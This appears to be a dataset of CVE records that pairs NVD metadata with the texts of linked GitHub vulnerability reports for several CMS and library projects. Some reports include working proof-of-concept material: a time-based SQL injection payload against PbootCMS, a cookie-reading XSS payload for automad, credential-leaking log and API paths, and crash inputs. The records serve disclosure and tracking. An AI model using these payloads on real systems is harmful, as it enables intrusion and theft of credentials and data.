] | 922 | https://github.com/Kitesky/KiteCMS/issues/10 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Kitesky",
"KiteCMS"
] | Hello, after testing, I found that KiteCMS v1.1 has a vulnerability -- ThinkPHP log information leak.
Anyone can read ThinkPHP's Log through the URL. Such logs contain the administrator's user name, password, operation behavior, system information, etc. Sensitive information brings greater security risks to the system.
URL: http://domain(or IP)/runtime/log/202107/10.log
For example:
http://test.19981.com/runtime/log/202107/10.log
http://test.19981.com/runtime/log/202107/03.log



| ThinkPHP log information leak vulnerability exists in KiteCMS v1.1 | https://api.github.com/repos/kitesky/KiteCMS/issues/10/comments | 0 | 2021-07-09T17:09:28Z | 2021-07-09T17:09:28Z | https://github.com/kitesky/KiteCMS/issues/10 | 940,936,166 | 10 | 4,692 |
CVE-2021-36569 | 2023-02-03T18:15:11.290 | Cross Site Request Forgery vulnerability in FUEL-CMS 1.4.13 allows remote attackers to run arbitrary code via post ID to /users/delete/2. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/578"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/578"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.13:*:*:*:*:*:*:*",
"matchCriteriaId": "22D4ECFB-0516-4086-83DA-AA5F1EE17D26",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/daylightstudio/FUEL-CMS/issues/578 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | Hi:
FUEL CMS 1.4.13 contains a cross-site request forgery (CSRF) vulnerability that can delete a user account via a post ID to /users/delete/2

POC:


| FUEL CMS 1.4.13 contains a cross-site request forgery (CSRF) vulnerability | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/578/comments | 0 | 2021-07-02T02:26:46Z | 2021-08-10T17:49:19Z | https://github.com/daylightstudio/FUEL-CMS/issues/578 | 935,354,402 | 578 | 4,693 |
CVE-2021-36570 | 2023-02-03T18:15:11.393 | Cross Site Request Forgery vulnerability in FUEL-CMS 1.4.13 allows remote attackers to run arbitrary code via post ID to /permissions/delete/2---. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/579"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/579"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.13:*:*:*:*:*:*:*",
"matchCriteriaId": "22D4ECFB-0516-4086-83DA-AA5F1EE17D26",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/daylightstudio/FUEL-CMS/issues/579 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | FUEL CMS 1.4.13 contains a cross-site request forgery (CSRF) vulnerability that can delete a Permission via a post ID to /permissions/delete/2

POC:

The page:

| FUEL CMS 1.4.13 contains a cross-site request forgery (CSRF) vulnerability | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/579/comments | 0 | 2021-07-02T02:35:59Z | 2021-07-03T01:33:05Z | https://github.com/daylightstudio/FUEL-CMS/issues/579 | 935,357,769 | 579 | 4,694 |
CVE-2021-37304 | 2023-02-03T18:15:11.770 | An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/2793"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/2793"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FAC1F1CC-39F3-4B9F-A810-FE74D5E636F2",
"versionEndExcluding": null,
"versionEndIncluding": "2.4.5",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"732"
] | 732 | https://github.com/jeecgboot/jeecg-boot/issues/2793 | [
"Third Party Advisory"
] | github.com | [
"jeecgboot",
"jeecg-boot"
] | ##### 版本号:
2.4.5

##### 问题描述:
Unauthorized access to the httptrace interface reveals sensitive information such as user cookies
##### 截图&代码:
api interface
http://Ip:8080/jeecg-boot/actuator/httptrace/
This interface does not require any login permissions
local demo

Many jeecg-boot frameworks have such vulnerabilities, such as

The leaked information includes client IP, browser useragent, cookie, token, etc.
友情提示: 未按格式要求发帖,会直接删掉。
| [security issue] The jeecg-boot version is less than or equal to 2.4.5 httptrace interface has unauthorized access and leaks sensitive information such as user cookies | https://api.github.com/repos/jeecgboot/JeecgBoot/issues/2793/comments | 1 | 2021-07-15T08:12:15Z | 2021-07-15T10:06:18Z | https://github.com/jeecgboot/JeecgBoot/issues/2793 | 945,118,917 | 2,793 | 4,696 |
CVE-2021-37305 | 2023-02-03T18:15:11.890 | An Insecure Permissions issue in jeecg-boot 2.4.5 and earlier allows remote attackers to gain escalated privilege and view sensitive information via api uri: /sys/user/querySysUser?username=admin. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/2794"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/2794"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FAC1F1CC-39F3-4B9F-A810-FE74D5E636F2",
"versionEndExcluding": null,
"versionEndIncluding": "2.4.5",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"732"
] | 732 | https://github.com/jeecgboot/jeecg-boot/issues/2794 | [
"Third Party Advisory"
] | github.com | [
"jeecgboot",
"jeecg-boot"
] | ##### 版本号:
<=2.4.5
##### 问题描述:
###### 1. leaks sensitive information api uri: /sys/user/querySysUser?username=admin

leaks sensitive information such as phone .etc
###### 2. Enumerate usernames api uri:/sys/user/checkOnlyUser?username=admin


Through enumeration, it is found that there are 2 accounts admin and user1 in the system
##### 截图&代码:
version:2.4.5




友情提示: 未按格式要求发帖,会直接删掉。
| [2 secueiry issue]jeecg-boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system | https://api.github.com/repos/jeecgboot/JeecgBoot/issues/2794/comments | 1 | 2021-07-15T08:32:21Z | 2021-08-05T07:02:44Z | https://github.com/jeecgboot/JeecgBoot/issues/2794 | 945,135,797 | 2,794 | 4,697 |
CVE-2021-37497 | 2023-02-03T18:15:13.547 | SQL injection vulnerability in route of PbootCMS 3.0.5 allows remote attackers to run arbitrary SQL commands via crafted GET request. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/penson233/Vuln/issues/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Vendor Advisory"
],
"url": "https://www.pbootcms.com/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/penson233/Vuln/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Vendor Advisory"
],
"url": "https://www.pbootcms.com/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pbootcms:pbootcms:3.0.5:*:*:*:*:*:*:*",
"matchCriteriaId": "444F4807-9CDD-43EC-B5BE-B2C9738B6154",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/penson233/Vuln/issues/3 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"penson233",
"Vuln"
] | poc
/?member')^if((ascii(substr((select(database())),1,1))>1),1,sleep(3))%23/login/
detail:
request a get

If the time exceeds 3 seconds,the payload is ok ,we can use the payload to find the information of database
such as the name for database


<img width="445" alt="image" src="https://user-images.githubusercontent.com/60385154/192101174-3046dbe8-a476-499d-91d3-60bb90036a6d.png">
it also cause error sql injection | PbootCMS V3.0.5 sql injection | https://api.github.com/repos/penson233/Vuln/issues/3/comments | 0 | 2021-07-22T11:31:00Z | 2022-09-24T13:41:38Z | https://github.com/penson233/Vuln/issues/3 | 950,562,008 | 3 | 4,698 |
CVE-2021-37501 | 2023-02-03T18:15:13.670 | Buffer Overflow vulnerability in HDFGroup hdf5-h5dump 1.12.0 through 1.13.0 allows attackers to cause a denial of service via h5tools_str_sprint in /hdf5/tools/lib/h5tools_str.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://github.com/HDFGroup/hdf5"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/HDFGroup/hdf5/issues/2458"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ST4RF4LL/Something_Found/blob/main/HDF5_v1.13.0_h5dump_heap_overflow.md"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://github.com/HDFGroup/hdf5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/HDFGroup/hdf5/issues/2458"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ST4RF4LL/Something_Found/blob/main/HDF5_v1.13.0_h5dump_heap_overflow.md"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hdfgroup:hdf5:*:*:*:*:*:*:*:*",
"matchCriteriaId": "926F8DD9-82F6-42CA-832B-8A368CA68AF3",
"versionEndExcluding": null,
"versionEndIncluding": "1.13.0",
"versionStartExcluding": null,
"versionStartIncluding": "1.12.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/HDFGroup/hdf5/issues/2458 | null | github.com | [
"HDFGroup",
"hdf5"
] | **Describe the bug**
[CVE-2021-37501](https://nvd.nist.gov/vuln/detail/CVE-2021-37501) (GHSA-rfgw-5vq3-wrjf) describes a buffer overflow in h5dump, a [reproducer](https://github.com/ST4RF4LL/Something_Found/blob/main/HDF5_v1.13.0_h5dump_heap_overflow.assets/poc) and [description](https://github.com/ST4RF4LL/Something_Found/blob/main/HDF5_v1.13.0_h5dump_heap_overflow.md) for this can be found in
https://github.com/ST4RF4LL/Something_Found.
The root cause is an artificially large size of a dimension in a dataspace message which causes the size of the on-disk data to exceed the addressable range and thus causes a multiplication to overflow.
In `src/H5Oattr.c:H5O__attr_decode()` with `ds_size` being set to 4611686018427387904 (0x4000000000000000) and `dt_size` equal to 8, the multiplication in:
```
H5_CHECKED_ASSIGN(attr->shared->data_size, size_t, ds_size * (hsize_t)dt_size, hsize_t);
```
overflows and is truncated to 0.
Since there is no provision to detect the overflow, the size is underestimated which will finally lead to a heap buffer overflow when the data is read with a subsequent segfault.
**Expected behavior**
The size overflow should be detected and the respective decode function should report an error so that the caller will terminate gracefully.
**Platform**
- at least HDF5 1.10.8 and later (including current 'develop' branch)
- openSUSE Leap 15.4/ SLE 15 SP4 / openSUSE Tumbleweed
- gcc7
- Autotools
- `configure --enable-fortran --enable-unsupported --enable-hl --enable-shared --enable-threadsafe --enable-build-mode=production --enable-cxx --with-pthread`
| [CVE-2021-37501] buffer overflow in h5dump | https://api.github.com/repos/HDFGroup/hdf5/issues/2458/comments | 6 | 2023-02-11T21:04:17Z | 2023-07-03T18:55:03Z | https://github.com/HDFGroup/hdf5/issues/2458 | 1,581,015,113 | 2,458 | 4,699 |
CVE-2021-37502 | 2023-02-03T18:15:13.793 | Cross Site Scripting (XSS) vulnerability in automad 1.7.5 allows remote attackers to run arbitrary code via the user name field when adding a user. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/marcantondahmen/automad/issues/29"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/marcantondahmen/automad/issues/29"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:automad:automad:1.7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "C3FA527D-E666-4FE2-8658-736A14F72A1B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/marcantondahmen/automad/issues/29 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"marcantondahmen",
"automad"
] | Add a user with name:"><script>alert(document.cookie)</script>。


xss payload was embeded in config/accounts.php:

/gui/accounts.php:add() function without verify the user input!

| Storage XSS vulnerability in /gui/accounts.php | https://api.github.com/repos/marcantondahmen/automad/issues/29/comments | 1 | 2021-07-22T16:57:04Z | 2021-08-08T11:35:38Z | https://github.com/marcantondahmen/automad/issues/29 | 950,864,642 | 29 | 4,700 |
CVE-2021-37518 | 2023-02-03T18:15:13.950 | Universal Cross Site Scripting (UXSS) vulnerability in Vimium Extension 1.66 and earlier allows remote attackers to run arbitrary code via omnibar feature. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/philc/vimium/issues/3832"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/philc/vimium/pull/3850"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/philc/vimium/issues/3832"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/philc/vimium/pull/3850"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:vimium_project:vimium:*:*:*:*:*:*:*:*",
"matchCriteriaId": "31FE0D40-1359-422F-BC91-CE406C27173A",
"versionEndExcluding": null,
"versionEndIncluding": "1.66",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/philc/vimium/issues/3832 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"philc",
"vimium"
] | **Describe the bug**
Attacker can use vimium omnibar feature to execute arbitrary JS code over any site.
This can be caused by combination of low entropy PRNG used as vimium "secretToken" as well as invalid messages sent between different content-scripts in page.
**Full Technical Description:**
https://docs.google.com/document/d/1BdsJ3IRV05dodVfgWHLDRgM1FTkgswiMPxGHl_ufNho/edit
**Bug Video:**
https://youtu.be/bklyYCtECF0
**To Reproduce**
Steps to reproduce the behaviour:
1. Checkout this GitHub:
https://github.com/barakolo/VimiumUXSS
2. Find out current "VimiumSecret" (This can also be extracted by simple brute-force because of bad PRNG as I explained in the sharable docs):
To do that -
** open Chrome DevTools, and change the Javascript context to “Vimium extension” (Under the Console tab -> click on the arrow sign below it).
b. Now Run this line of code (we are now running it in zotero content-scripts context):
chrome.storage.local.get('vimiumSecret', e=>console.log(e['vimiumSecret']))
c. Save this code aside (this is a small number with a max 10-digits which is being used across all sites).
3. Change Line 27 inside abc.js to the current "vimiumSecret" extracted.
4. Now, open SimpleHTTPServer over this github repo:
python2 -m SimpleHTTPServer 8080
5. Surf to this site, and click enter once or two.
6. Observe that alert() is executed over "example.com" now.
**Browser and Vimium version**
Vimium Version: 1.66 (March 2, 2020)
Chrome version: 91.0.4472.77
OS version: Windows 10 Home 19042.985 | UXSS inside Vimium vomnibar feature | https://api.github.com/repos/philc/vimium/issues/3832/comments | 7 | 2021-06-07T00:22:36Z | 2021-07-10T04:54:45Z | https://github.com/philc/vimium/issues/3832 | 912,988,212 | 3,832 | 4,701 |
CVE-2021-37519 | 2023-02-03T18:15:14.080 | Buffer Overflow vulnerability in authfile.c memcached 1.6.9 allows attackers to cause a denial of service via crafted authenticattion file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/memcached/memcached/issues/805"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/memcached/memcached/pull/806/commits/264722ae4e248b453be00e97197dadc685b60fd0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/memcached/memcached/issues/805"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/memcached/memcached/pull/806/commits/264722ae4e248b453be00e97197dadc685b60fd0"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:memcached:memcached:1.6.9:*:*:*:*:*:*:*",
"matchCriteriaId": "EB6BFCFB-66D7-44B0-BFB2-3A17EA62EA8C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/memcached/memcached/issues/805 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"memcached",
"memcached"
] | ### Tested On:
memcached 1.6.9
### PoC:
[a.txt](https://github.com/memcached/memcached/files/6838558/a.txt)
./memcached --auth-file=input/a.txt -u root -m 1024 -p 11211
=================================================================
==1061115==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000009e at pc 0x7fae5a305f9d bp 0x7ffee16f4fd0 sp 0x7ffee16f4778
WRITE of size 15 at 0x60200000009e thread T0
#0 0x7fae5a305f9c (/lib/x86_64-linux-gnu/libasan.so.5+0x53f9c)
#1 0x55bca5ccaf23 in fgets /usr/include/x86_64-linux-gnu/bits/stdio2.h:265
#2 0x55bca5ccaf23 in authfile_load /home/constantine/test/memcached/authfile.c:50
#3 0x55bca5c3ffb5 in main /home/constantine/test/memcached/memcached.c:5639
#4 0x7fae597010b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#5 0x55bca5c45d9d in _start (/home/constantine/test/memcached/memcached+0x26d9d)
0x60200000009e is located 0 bytes to the right of 14-byte region [0x602000000090,0x60200000009e)
allocated by thread T0 here:
#0 0x7fae5a3bfdc6 in calloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10ddc6)
#1 0x55bca5ccaedd in authfile_load /home/constantine/test/memcached/authfile.c:44
SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0x53f9c)
Shadow bytes around the buggy address:
0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff8000: fa fa 00 04 fa fa 00 00 fa fa 00 00 fa fa 00 00
=>0x0c047fff8010: fa fa 00[06]fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==1061115==ABORTING | Heap buffer overflow | https://api.github.com/repos/memcached/memcached/issues/805/comments | 1 | 2021-07-19T06:49:27Z | 2021-07-25T22:21:42Z | https://github.com/memcached/memcached/issues/805 | 947,325,198 | 805 | 4,702 |
CVE-2023-23086 | 2023-02-03T18:15:16.837 | Buffer OverFlow Vulnerability in MojoJson v1.2.3 allows an attacker to execute arbitrary code via the SkipString function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/scottcgi/MojoJson/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/scottcgi/MojoJson/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mojojson_project:mojojson:1.2.3:*:*:*:*:*:*:*",
"matchCriteriaId": "8E333017-5C96-4C80-8EC4-7EE492AA081B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/scottcgi/MojoJson/issues/2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"scottcgi",
"MojoJson"
] | input value : "@\<=>?@ABCDEFGHIJiLM$^\^&(^(
you can use ASAN compile the lib and the API JsonValue* value = AJson->Parse(jsonString); it supply and input this value to the API .
it can trige in a buffer-overflow bug.
=================================================================
